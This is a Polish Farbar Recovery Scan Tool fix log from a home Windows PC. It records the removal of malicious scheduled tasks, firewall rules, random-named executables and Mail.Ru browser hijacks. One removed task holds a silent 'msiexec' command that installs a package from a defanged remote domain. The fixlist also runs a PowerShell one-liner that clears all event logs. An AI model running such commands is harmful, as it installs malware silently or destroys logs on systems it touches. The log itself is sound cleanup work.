- Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 11.03.2019
- Uruchomiony przez joannas (13-03-2019 20:00:36) Run:1
- Uruchomiony z C:\Users\joannas\Downloads
- Załadowane profile: joannas (Dostępne profile: joannas)
- Tryb startu: Normal
- ==============================================
- fixlist - zawartość:
- *****************
- CloseProcesses:
- ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> Brak pliku
- ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => -> Brak pliku
- ContextMenuHandlers1: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} => -> Brak pliku
- ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => -> Brak pliku
- ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> Brak pliku
- ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku
- ContextMenuHandlers6: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} => -> Brak pliku
- Task: {68FEAA01-3A47-4E4C-B55A-1685368B3150} - System32\Tasks\{3543EE5D-FE99-AD25-23F5-03742BD2251B} => "msiexec" /q /i hxxps://refreshnerer711rb.info/G5UinNOyp5.6zZ <==== UWAGA
- Task: {ACACA2F2-8091-4146-B26F-4CA8CA18299D} - System32\Tasks\{54D55C0D-2609-A62F-A35D-C02F1C8F7189} => C:\Program Files (x86)\Common Files\INhrB.exe (Microsoft Windows -> Microsoft Corporation)
- Task: {D0D2DFB7-2A38-4163-9F20-E25B09C5BCE2} - System32\Tasks\Microsoft\Windows\Google\GoogleUpdateTaskMachineUP => C:\WINDOWS\SysWOW64\Microsoft\Protect\S-1-91-36\RB_1.3.20.90.exe <==== UWAGA
- FirewallRules: [{0A1FE4EE-7B27-4B07-AF31-6C95E78B3548}] => (Allow) C:\WINDOWS\SysWOW64\OYYwFQYdnix.exe (Microsoft Windows -> Microsoft Corporation)
- FirewallRules: [{5A1F1C2F-F3FE-4C89-A0AC-1E4D6972C887}] => (Allow) C:\Program Files (x86)\Common Files\INhrB.exe (Microsoft Windows -> Microsoft Corporation)
- C:\Program Files (x86)\Common Files\INhrB.exe
- C:\WINDOWS\SysWOW64\OYYwFQYdnix.exe
- FirewallRules: [{64503A19-D801-4A3B-80ED-4916B76F6D5E}] => (Allow) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHost.exe Brak pliku
- FirewallRules: [{0590994E-2B06-4CFF-89E8-0D5AE7939375}] => (Allow) C:\Program Files (x86)\Common Files\Mcafee\MMSSHost\MMSSHost.exe Brak pliku
- FirewallRules: [TCP Query User{CF495584-0657-43CB-B826-656336E9242E}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe] => (Allow) C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe Brak pliku
- FirewallRules: [UDP Query User{0F180A3F-AF47-4AAF-BB09-219B34B7451A}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe] => (Allow) C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe Brak pliku
- 1601-01-03 21:26 - 1601-01-03 21:26 - 000060416 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\INhrB.exe
- 1601-01-03 21:26 - 1601-01-03 21:26 - 000178688 ____N (Microsoft Corporation) C:\Users\joannas\AppData\Local\ieauOreoYaK.exe
- 2019-03-13 10:09 - 2019-03-13 10:09 - 000000003 _____ () C:\Users\joannas\AppData\Local\wbem.ini
- HKU\S-1-5-21-854575094-164889968-2061861544-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://mail.ru/cnt/10445?gp=834423
- SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxps://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7BFF4B9E31-DD93-4183-8168-740E7AF4C5A8%7D&gp=811610
- SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> {97F86C3D-A5E8-482E-BF0C-5080B7E20233} URL =
- SearchScopes: HKU\S-1-5-21-854575094-164889968-2061861544-1002 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxps://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7BFF4B9E31-DD93-4183-8168-740E7AF4C5A8%7D&gp=811610
- BHO-x32: [email protected] -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\joannas\AppData\Local\Mail.Ru\Sputnik\ie_addon_dll.dll [2019-03-13] (LLC Mail.Ru -> Mail.Ru)
- Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~2\mcafee\SITEAD~1\mcieplg.dll Brak pliku
- 2019-03-13 10:09 - 2019-03-13 10:22 - 000000000 ____D C:\ProgramData\localNETService
- 2019-03-13 10:09 - 2019-03-13 10:14 - 000000000 ____D C:\Users\joannas\AppData\Local\Mail.Ru
- 2019-03-13 10:09 - 2019-03-13 10:09 - 000000000 ____D C:\ProgramData\Mail.Ru
- CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
- CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
- S3 mfeavfk04; \Device\mfeavfk04.sys [X]
- Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
- EmptyTemp:
- *****************
- Procesy zostały pomyślnie zamknięte.
- HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\7-Zip => pomyślnie usunięto
- HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} => nie znaleziono
- HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\ANotepad++64 => pomyślnie usunięto
- HKLM\Software\Classes\CLSID\{B298D29A-A6ED-11DE-BA8C-A68E55D89593} => nie znaleziono
- HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\BriefcaseMenu => pomyślnie usunięto
- "HKLM\Software\Classes\CLSID\{85BBD920-42A0-1069-A2E4-08002B30309D}" => pomyślnie usunięto
- HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\{4A7C4306-57E0-4C0C-83A9-78C1528F618C} => pomyślnie usunięto
- HKLM\Software\Classes\CLSID\{4A7C4306-57E0-4C0C-83A9-78C1528F618C} => nie znaleziono
- HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\7-Zip => pomyślnie usunięto
- HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} => nie znaleziono
- HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => pomyślnie usunięto
- HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => nie znaleziono
- HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\BriefcaseMenu => pomyślnie usunięto
- HKLM\Software\Classes\CLSID\{85BBD920-42A0-1069-A2E4-08002B30309D} => nie znaleziono
- "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{68FEAA01-3A47-4E4C-B55A-1685368B3150}" => pomyślnie usunięto
- "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{68FEAA01-3A47-4E4C-B55A-1685368B3150}" => pomyślnie usunięto
- C:\WINDOWS\System32\Tasks\{3543EE5D-FE99-AD25-23F5-03742BD2251B} => pomyślnie przeniesiono
- "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{3543EE5D-FE99-AD25-23F5-03742BD2251B}" => pomyślnie usunięto
- "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{ACACA2F2-8091-4146-B26F-4CA8CA18299D}" => pomyślnie usunięto
- "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ACACA2F2-8091-4146-B26F-4CA8CA18299D}" => pomyślnie usunięto
- C:\WINDOWS\System32\Tasks\{54D55C0D-2609-A62F-A35D-C02F1C8F7189} => pomyślnie przeniesiono
- "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{54D55C0D-2609-A62F-A35D-C02F1C8F7189}" => pomyślnie usunięto
- "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D0D2DFB7-2A38-4163-9F20-E25B09C5BCE2}" => pomyślnie usunięto
- "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D0D2DFB7-2A38-4163-9F20-E25B09C5BCE2}" => pomyślnie usunięto
- C:\WINDOWS\System32\Tasks\Microsoft\Windows\Google\GoogleUpdateTaskMachineUP => pomyślnie przeniesiono
- "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Google\GoogleUpdateTaskMachineUP" => pomyślnie usunięto
- "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0A1FE4EE-7B27-4B07-AF31-6C95E78B3548}" => pomyślnie usunięto
- "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5A1F1C2F-F3FE-4C89-A0AC-1E4D6972C887}" => pomyślnie usunięto
- C:\Program Files (x86)\Common Files\INhrB.exe => pomyślnie przeniesiono
- C:\WINDOWS\SysWOW64\OYYwFQYdnix.exe => pomyślnie przeniesiono
- "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{64503A19-D801-4A3B-80ED-4916B76F6D5E}" => pomyślnie usunięto
- "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0590994E-2B06-4CFF-89E8-0D5AE7939375}" => pomyślnie usunięto
- "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{CF495584-0657-43CB-B826-656336E9242E}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe" => pomyślnie usunięto
- "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{0F180A3F-AF47-4AAF-BB09-219B34B7451A}C:\users\joannas\appdata\local\microsoft\skypeforbusinessplugin\16.2.0.242\pluginhost.exe" => pomyślnie usunięto
- "C:\Program Files (x86)\Common Files\INhrB.exe" => nie znaleziono
- C:\Users\joannas\AppData\Local\ieauOreoYaK.exe => pomyślnie przeniesiono
- C:\Users\joannas\AppData\Local\wbem.ini => pomyślnie przeniesiono
- HKU\S-1-5-21-854575094-164889968-2061861544-1002\Software\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono
- "HKU\S-1-5-21-854575094-164889968-2061861544-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => pomyślnie usunięto
- HKU\S-1-5-21-854575094-164889968-2061861544-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{97F86C3D-A5E8-482E-BF0C-5080B7E20233} => pomyślnie usunięto
- HKLM\Software\Classes\CLSID\{97F86C3D-A5E8-482E-BF0C-5080B7E20233} => nie znaleziono
- HKU\S-1-5-21-854575094-164889968-2061861544-1002\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} => pomyślnie usunięto
- HKLM\Software\Classes\CLSID\{FFEBBF0A-C22C-4172-89FF-45215A135AC7} => nie znaleziono
- HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E8F97CD-60B5-456F-A201-73065652D099} => pomyślnie usunięto
- HKLM\Software\Wow6432Node\Classes\CLSID\{8E8F97CD-60B5-456F-A201-73065652D099} => pomyślnie usunięto
- HKLM\Software\Classes\PROTOCOLS\Handler\sacore => pomyślnie usunięto
- HKLM\Software\Classes\CLSID\{5513F07E-936B-4E52-9B00-067394E91CC5} => pomyślnie usunięto
- C:\ProgramData\localNETService => pomyślnie przeniesiono
- C:\Users\joannas\AppData\Local\Mail.Ru => pomyślnie przeniesiono
- C:\ProgramData\Mail.Ru => pomyślnie przeniesiono
- HKLM\SOFTWARE\Google\Chrome\Extensions\fheoggkfdfchfphceeifdbepaooicaho => pomyślnie usunięto
- HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\fheoggkfdfchfphceeifdbepaooicaho => pomyślnie usunięto
- HKLM\System\CurrentControlSet\Services\mfeavfk04 => pomyślnie usunięto
- mfeavfk04 => serwis pomyślnie usunięto
- ========= wevtutil el | Foreach-Object {wevtutil cl "$_"} =========
- ========= Koniec Powershell: =========
- =========== EmptyTemp: ==========
- BITS transfer queue => 9199616 B
- DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 881544853 B
- Java, Flash, Steam htmlcache => 1568 B
- Windows/system/drivers => 733723 B
- Edge => 6036248 B
- Chrome => 0 B
- Firefox => 946688712 B
- Opera => 0 B
- Temp, IE cache, history, cookies, recent:
- Default => 6656 B
- Users => 0 B
- ProgramData => 0 B
- Public => 0 B
- systemprofile => 12732255 B
- systemprofile32 => 0 B
- LocalService => 48150 B
- LocalService => 0 B
- NetworkService => 52568 B
- NetworkService => 0 B
- joannas => 108308419 B
- RecycleBin => 0 B
- EmptyTemp: => 1.8 GB danych tymczasowych Usunięto.
- ================================
- System wymagał restartu.
- ==== Koniec Fixlog 20:02:18 ====